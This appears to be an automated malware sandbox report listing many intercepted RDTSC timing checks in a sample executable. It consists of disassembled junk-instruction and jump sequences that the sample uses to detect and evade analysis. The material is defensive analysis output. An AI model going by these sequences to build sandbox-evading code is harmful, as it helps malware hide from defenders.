    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2877D second address: A28804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D249Ah], ecx 0x0000000f clc 0x00000010 lea eax, dword ptr [ebp+12476411h] 0x00000016 mov cx, 72FEh 0x0000001a push eax 0x0000001b push edi 0x0000001c jmp 00007FB418E0AE81h 0x00000021 pop edi 0x00000022 mov dword ptr [esp], eax 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007FB418E0AE78h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 0000001Bh 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f mov ecx, 6449ED42h 0x00000044 lea eax, dword ptr [ebp+124763CDh] 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007FB418E0AE78h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28804 second address: A28809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28809 second address: A11008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+122D2BAAh] 0x00000012 mov ecx, esi 0x00000014 call dword ptr [ebp+122D3694h] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jg 00007FB418E0AE76h 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A67C67 second address: A67C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A67F29 second address: A67F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A681FC second address: A68201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68201 second address: A6820D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB418E0AE76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68358 second address: A6835E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A6835E second address: A68368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A684B0 second address: A684B9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A684B9 second address: A684CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB418E0AE76h 0x0000000a je 00007FB418E0AE76h 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A684CA second address: A684D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68626 second address: A6862C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A6862C second address: A68642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB418AEFE4Dh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68642 second address: A68665 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB418E0AE83h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68665 second address: A68669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68669 second address: A68689 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418E0AE76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E0AE82h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68689 second address: A68699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FB418AEFE46h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A68699 second address: A6869D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A6C1DB second address: A6C214 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FB418AEFE55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FB418AEFE59h 0x00000011 pop ecx 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A6C214 second address: A6C228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE7Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A6C228 second address: A6C243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB418AEFE4Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB418AEFE46h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A6C243 second address: A6C247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A72C0D second address: A72C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A71A9B second address: A71AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A71EDA second address: A71EF4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418AEFE4Ch 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A71EF4 second address: A71EFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A72051 second address: A7208F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB418AEFE4Ah 0x0000000a pop esi 0x0000000b pushad 0x0000000c jc 00007FB418AEFE65h 0x00000012 jmp 00007FB418AEFE59h 0x00000017 jbe 00007FB418AEFE46h 0x0000001d js 00007FB418AEFE4Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A72931 second address: A72944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FB418E0AE82h 0x0000000b jo 00007FB418E0AE76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F04BA second address: 9F04C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F04C0 second address: 9F04D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d js 00007FB418E0AE76h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F04D9 second address: 9F04E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F04E8 second address: 9F04F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9F04F0 second address: 9F04F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A77B7C second address: A77B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A77B80 second address: A77B96 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB418AEFE4Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A77B96 second address: A77B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A77E56 second address: A77E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB418AEFE52h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A77F94 second address: A77F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A7C7DF second address: A7C832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FB418AEFE56h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FB418AEFE4Fh 0x0000001d ja 00007FB418AEFE46h 0x00000023 popad 0x00000024 pushad 0x00000025 jg 00007FB418AEFE46h 0x0000002b jp 00007FB418AEFE46h 0x00000031 ja 00007FB418AEFE46h 0x00000037 popad 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A81AA3 second address: A81ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB418E0AE7Eh 0x0000000c jns 00007FB418E0AE82h 0x00000012 popad 0x00000013 push ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A81F22 second address: A81F28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8222C second address: A82236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB418E0AE76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A82236 second address: A8223A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 9EE9CC second address: 9EE9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A864AE second address: A864B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A864B3 second address: A864EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FB418E0AE7Eh 0x00000011 jmp 00007FB418E0AE7Fh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A864EE second address: A86504 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jne 00007FB418AEFE52h 0x0000000e jnl 00007FB418AEFE46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A867F1 second address: A8680D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8680D second address: A8681F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FB418AEFE46h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8681F second address: A86823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86963 second address: A86969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86D60 second address: A86D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86D64 second address: A86D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FB418AEFE4Ah 0x0000000c pop edi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86D76 second address: A86D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86D7C second address: A86D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86D8E second address: A86D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86D92 second address: A86DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FB418AEFE4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86DA0 second address: A86DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A86DAD second address: A86DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8D55C second address: A8D560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8D560 second address: A8D578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE54h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8D578 second address: A8D5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB418E0AE85h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB418E0AE82h 0x00000016 jmp 00007FB418E0AE84h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8D5BF second address: A8D5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8DAF8 second address: A8DB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E0AE87h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8DB13 second address: A8DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8DDEE second address: A8DE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007FB418E0AE7Dh 0x00000011 pop ebx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A8DE08 second address: A8DE0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A94C96 second address: A94CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE7Bh 0x00000009 jmp 00007FB418E0AE7Eh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99686 second address: A99690 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418AEFE5Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99972 second address: A99978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99978 second address: A9999E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FB418AEFE51h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A9999E second address: A999AC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99B1E second address: A99B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99B24 second address: A99B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99B2A second address: A99B3F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99B3F second address: A99B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99B43 second address: A99B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99CC9 second address: A99CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418E0AE7Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99CDC second address: A99CE6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418AEFE46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A99E40 second address: A99E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A9A0B9 second address: A9A0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A9A0BD second address: A9A0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA19F6 second address: AA1A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB418AEFE57h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FB418AEFE57h 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA1A37 second address: AA1A42 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FB418E0AE76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA1F68 second address: AA1F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA20ED second address: AA2115 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB418E0AE80h 0x00000008 jnc 00007FB418E0AE76h 0x0000000e jc 00007FB418E0AE76h 0x00000014 popad 0x00000015 jnp 00007FB418E0AE7Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2115 second address: AA2132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FB418AEFE65h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418AEFE4Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2132 second address: AA2136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: AA2136 second address: AA213A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
